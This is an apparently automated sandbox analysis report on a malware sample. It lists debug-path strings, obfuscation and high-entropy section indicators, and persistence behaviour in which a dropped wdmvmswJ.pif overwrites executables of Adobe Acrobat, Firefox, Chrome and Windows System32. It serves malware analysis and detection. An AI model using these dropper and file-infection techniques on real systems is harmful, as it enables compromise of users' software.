                Source: Binary string: locator.pdb source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: mavinject32.pdb source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: 64BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2227816265.000000001E790000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: snmptrap.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msdtcexe.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerceptionSimulationService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: wdmvmswJ.pif, 0000000C.00000003.2209705208.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: maintenanceservice.pdb` source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: WmiApSrv.pdb source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: locator.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: AppVShNotify.pdb source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Users\Public\Libraries\wdmvmswJ.pif Unpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:EW;
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif Unpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:EW;
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif Unpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif Unpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack
                Source: Yara match File source: 4.2.x.exe.2af0000.0.unpack, type: UNPACKEDPE
                Source: wdmvmswJ.pif.4.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0894C LoadLibraryW,GetProcAddress,FreeLibrary, 4_2_02B0894C
                Source: alpha.pif.8.dr Static PE information: section name: .didat
                Source: Acrobat.exe.12.dr Static PE information: section name: .didat
                Source: setup.exe.12.dr Static PE information: section name: .didat
                Source: setup.exe.12.dr Static PE information: section name: _RDATA
                Source: updater.exe.12.dr Static PE information: section name: .00cfg
                Source: updater.exe.12.dr Static PE information: section name: .voltbl
                Source: updater.exe.12.dr Static PE information: section name: _RDATA
                Source: IntegratedOffice.exe.12.dr Static PE information: section name: .didat
                Source: IntegratedOffice.exe.12.dr Static PE information: section name: _RDATA
                Source: OfficeC2RClient.exe.12.dr Static PE information: section name: .didat
                Source: OfficeC2RClient.exe.12.dr Static PE information: section name: .detourc
                Source: officesvcmgr.exe.12.dr Static PE information: section name: .didat
                Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: .00cfg
                Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: .gxfg
                Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: .retplne
                Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: LZMADEC
                Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: _RDATA
                Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: malloc_h
                Source: chrmstp.exe.12.dr Static PE information: section name: .00cfg
                Source: chrmstp.exe.12.dr Static PE information: section name: .gxfg
                Source: chrmstp.exe.12.dr Static PE information: section name: .retplne
                Source: chrmstp.exe.12.dr Static PE information: section name: CPADinfo
                Source: chrmstp.exe.12.dr Static PE information: section name: LZMADEC
                Source: chrmstp.exe.12.dr Static PE information: section name: _RDATA
                Source: chrmstp.exe.12.dr Static PE information: section name: malloc_h
                Source: setup.exe0.12.dr Static PE information: section name: .00cfg
                Source: setup.exe0.12.dr Static PE information: section name: .gxfg
                Source: setup.exe0.12.dr Static PE information: section name: .retplne
                Source: setup.exe0.12.dr Static PE information: section name: CPADinfo
                Source: setup.exe0.12.dr Static PE information: section name: LZMADEC
                Source: setup.exe0.12.dr Static PE information: section name: _RDATA
                Source: setup.exe0.12.dr Static PE information: section name: malloc_h
                Source: armsvc.exe.12.dr Static PE information: section name: .didat
                Source: alg.exe.12.dr Static PE information: section name: .didat
                Source: GoogleCrashHandler64.exe.12.dr Static PE information: section name: _RDATA
                Source: GoogleCrashHandler64.exe.12.dr Static PE information: section name: .gxfg
                Source: GoogleCrashHandler64.exe.12.dr Static PE information: section name: .gehcont
                Source: FXSSVC.exe.12.dr Static PE information: section name: .didat
                Source: elevation_service.exe.12.dr Static PE information: section name: .00cfg
                Source: elevation_service.exe.12.dr Static PE information: section name: .gxfg
                Source: elevation_service.exe.12.dr Static PE information: section name: .retplne
                Source: elevation_service.exe.12.dr Static PE information: section name: _RDATA
                Source: elevation_service.exe.12.dr Static PE information: section name: malloc_h
                Source: elevation_service.exe0.12.dr Static PE information: section name: .00cfg
                Source: elevation_service.exe0.12.dr Static PE information: section name: .gxfg
                Source: elevation_service.exe0.12.dr Static PE information: section name: .retplne
                Source: elevation_service.exe0.12.dr Static PE information: section name: _RDATA
                Source: elevation_service.exe0.12.dr Static PE information: section name: malloc_h
                Source: maintenanceservice.exe.12.dr Static PE information: section name: .00cfg
                Source: maintenanceservice.exe.12.dr Static PE information: section name: .voltbl
                Source: maintenanceservice.exe.12.dr Static PE information: section name: _RDATA
                Source: GoogleUpdateComRegisterShell64.exe.12.dr Static PE information: section name: _RDATA
                Source: GoogleUpdateComRegisterShell64.exe.12.dr Static PE information: section name: .gxfg
                Source: GoogleUpdateComRegisterShell64.exe.12.dr Static PE information: section name: .gehcont
                Source: 117.0.5938.132_chrome_installer.exe.12.dr Static PE information: section name: .00cfg
                Source: 117.0.5938.132_chrome_installer.exe.12.dr Static PE information: section name: .retplne
                Source: msdtc.exe.12.dr Static PE information: section name: .didat
                Source: msiexec.exe.12.dr Static PE information: section name: .didat
                Source: MsSense.exe.12.dr Static PE information: section name: .didat
                Source: Spectrum.exe.12.dr Static PE information: section name: .didat
                Source: TieringEngineService.exe.12.dr Static PE information: section name: .didat
                Source: unpack200.exe.12.dr Static PE information: section name: .00cfg
                Source: ie_to_edge_stub.exe.12.dr Static PE information: section name: .00cfg
                Source: ie_to_edge_stub.exe.12.dr Static PE information: section name: .gxfg
                Source: ie_to_edge_stub.exe.12.dr Static PE information: section name: .retplne
                Source: ie_to_edge_stub.exe.12.dr Static PE information: section name: _RDATA
                Source: cookie_exporter.exe.12.dr Static PE information: section name: .00cfg
                Source: cookie_exporter.exe.12.dr Static PE information: section name: .gxfg
                Source: cookie_exporter.exe.12.dr Static PE information: section name: .retplne
                Source: cookie_exporter.exe.12.dr Static PE information: section name: _RDATA
                Source: identity_helper.exe.12.dr Static PE information: section name: .00cfg
                Source: identity_helper.exe.12.dr Static PE information: section name: .gxfg
                Source: identity_helper.exe.12.dr Static PE information: section name: .retplne
                Source: identity_helper.exe.12.dr Static PE information: section name: _RDATA
                Source: identity_helper.exe.12.dr Static PE information: section name: malloc_h
                Source: setup.exe1.12.dr Static PE information: section name: .00cfg
                Source: setup.exe1.12.dr Static PE information: section name: .gxfg
                Source: setup.exe1.12.dr Static PE information: section name: .retplne
                Source: setup.exe1.12.dr Static PE information: section name: LZMADEC
                Source: setup.exe1.12.dr Static PE information: section name: _RDATA
                Source: setup.exe1.12.dr Static PE information: section name: malloc_h
                Source: msedgewebview2.exe.12.dr Static PE information: section name: .00cfg
                Source: msedgewebview2.exe.12.dr Static PE information: section name: .gxfg
                Source: msedgewebview2.exe.12.dr Static PE information: section name: .retplne
                Source: msedgewebview2.exe.12.dr Static PE information: section name: CPADinfo
                Source: msedgewebview2.exe.12.dr Static PE information: section name: LZMADEC
                Source: msedgewebview2.exe.12.dr Static PE information: section name: _RDATA
                Source: msedgewebview2.exe.12.dr Static PE information: section name: malloc_h
                Source: vds.exe.12.dr Static PE information: section name: .didat
                Source: VSSVC.exe.12.dr Static PE information: section name: .didat
                Source: WmiApSrv.exe.12.dr Static PE information: section name: .didat
                Source: wmpnetwk.exe.12.dr Static PE information: section name: .didat
                Source: SearchIndexer.exe.12.dr Static PE information: section name: .didat
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B1D2FC push 02B1D367h; ret 4_2_02B1D35F
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF63AE push 02AF640Bh; ret 4_2_02AF6403
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF63B0 push 02AF640Bh; ret 4_2_02AF6403
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF332C push eax; ret 4_2_02AF3368
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B1C378 push 02B1C56Eh; ret 4_2_02B1C566
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFC349 push 8B02AFC1h; ret 4_2_02AFC34E
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B1D0AC push 02B1D125h; ret 4_2_02B1D11D
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0306B push 02B030B9h; ret 4_2_02B030B1
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0306C push 02B030B9h; ret 4_2_02B030B1
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B1D1F8 push 02B1D288h; ret 4_2_02B1D280
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0F108 push ecx; mov dword ptr [esp], edx 4_2_02B0F10D
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B1D144 push 02B1D1ECh; ret 4_2_02B1D1E4
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF6784 push 02AF67C6h; ret 4_2_02AF67BE
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF6782 push 02AF67C6h; ret 4_2_02AF67BE
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFD5A0 push 02AFD5CCh; ret 4_2_02AFD5C4
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B1C570 push 02B1C56Eh; ret 4_2_02B1C566
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFC56C push ecx; mov dword ptr [esp], edx 4_2_02AFC571
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0AAE0 push 02B0AB18h; ret 4_2_02B0AB10
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B08AD8 push 02B08B10h; ret 4_2_02B08B08
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0AADF push 02B0AB18h; ret 4_2_02B0AB10
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B64A50 push eax; ret 4_2_02B64B20
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFCBEC push 02AFCD72h; ret 4_2_02AFCD6A
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0886C push 02B088AEh; ret 4_2_02B088A6
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFC98E push 02AFCD72h; ret 4_2_02AFCD6A
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFC9DE push 02AFCD72h; ret 4_2_02AFCD6A
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0790C push 02B07989h; ret 4_2_02B07981
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B06946 push 02B069F3h; ret 4_2_02B069EB
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B06948 push 02B069F3h; ret 4_2_02B069EB
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B05E7C push ecx; mov dword ptr [esp], edx 4_2_02B05E7E
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B02F60 push 02B02FD6h; ret 4_2_02B02FCE
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 12_1_0041C40C push cs; iretd 12_1_0041C4E2
                Source: Acrobat.exe.12.dr Static PE information: section name: .reloc entropy: 7.857629901541196
                Source: setup.exe.12.dr Static PE information: section name: .rsrc entropy: 7.644733541214545
                Source: Aut2exe.exe.12.dr Static PE information: section name: .rsrc entropy: 7.800655098270515
                Source: Aut2exe_x64.exe.12.dr Static PE information: section name: .rsrc entropy: 7.800507924806883
                Source: AutoIt3_x64.exe.12.dr Static PE information: section name: .reloc entropy: 7.943934980231315
                Source: appvcleaner.exe.12.dr Static PE information: section name: .reloc entropy: 7.935643965778136
                Source: SciTE.exe.12.dr Static PE information: section name: .reloc entropy: 7.9123163296469805
                Source: IntegratedOffice.exe.12.dr Static PE information: section name: .reloc entropy: 7.926768905035472
                Source: OfficeC2RClient.exe.12.dr Static PE information: section name: .reloc entropy: 7.716531028347558
                Source: officesvcmgr.exe.12.dr Static PE information: section name: .reloc entropy: 7.937221399929087
                Source: chrome_pwa_launcher.exe.12.dr Static PE information: section name: .reloc entropy: 7.940586616723075
                Source: chrmstp.exe.12.dr Static PE information: section name: .reloc entropy: 7.941023886348422
                Source: setup.exe0.12.dr Static PE information: section name: .reloc entropy: 7.941032370435357
                Source: AppVClient.exe.12.dr Static PE information: section name: .reloc entropy: 7.936523067479569
                Source: jucheck.exe.12.dr Static PE information: section name: .reloc entropy: 7.931078087310504
                Source: jusched.exe.12.dr Static PE information: section name: .reloc entropy: 7.936052797736743
                Source: FXSSVC.exe.12.dr Static PE information: section name: .reloc entropy: 7.942279833740998
                Source: elevation_service.exe.12.dr Static PE information: section name: .reloc entropy: 7.943952204055294
                Source: elevation_service.exe0.12.dr Static PE information: section name: .reloc entropy: 7.945964485826929
                Source: 117.0.5938.132_chrome_installer.exe.12.dr Static PE information: section name: .reloc entropy: 7.93477484000238
                Source: SensorDataService.exe.12.dr Static PE information: section name: .reloc entropy: 7.935383609926094
                Source: Spectrum.exe.12.dr Static PE information: section name: .reloc entropy: 7.945453569107587
                Source: identity_helper.exe.12.dr Static PE information: section name: .reloc entropy: 7.940737618189385
                Source: setup.exe1.12.dr Static PE information: section name: .reloc entropy: 7.944730680089531
                Source: msedgewebview2.exe.12.dr Static PE information: section name: .reloc entropy: 7.93656284710181
                Source: AgentService.exe.12.dr Static PE information: section name: .reloc entropy: 7.937129466044474
                Source: vds.exe.12.dr Static PE information: section name: .reloc entropy: 7.94107270673957
                Source: VSSVC.exe.12.dr Static PE information: section name: .reloc entropy: 7.93954260709988
                Source: wbengine.exe.12.dr Static PE information: section name: .reloc entropy: 7.941290670440269
                Source: wmpnetwk.exe.12.dr Static PE information: section name: .reloc entropy: 7.946616363744485
                Source: SearchIndexer.exe.12.dr Static PE information: section name: .reloc entropy: 7.945863668494267

                Persistence and Installation Behavior

                Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\b2310dff430b0ac5.bin
                Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
                Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
                Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Jwsmvmdw.PIF
                Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\firefox.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\pingsender.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Mozilla Firefox\updater.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\wbem\WmiApSrv.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\vds.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\alg.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\7-Zip\7zFM.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\snmptrap.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\Spectrum.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Windows\System32\Locator.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
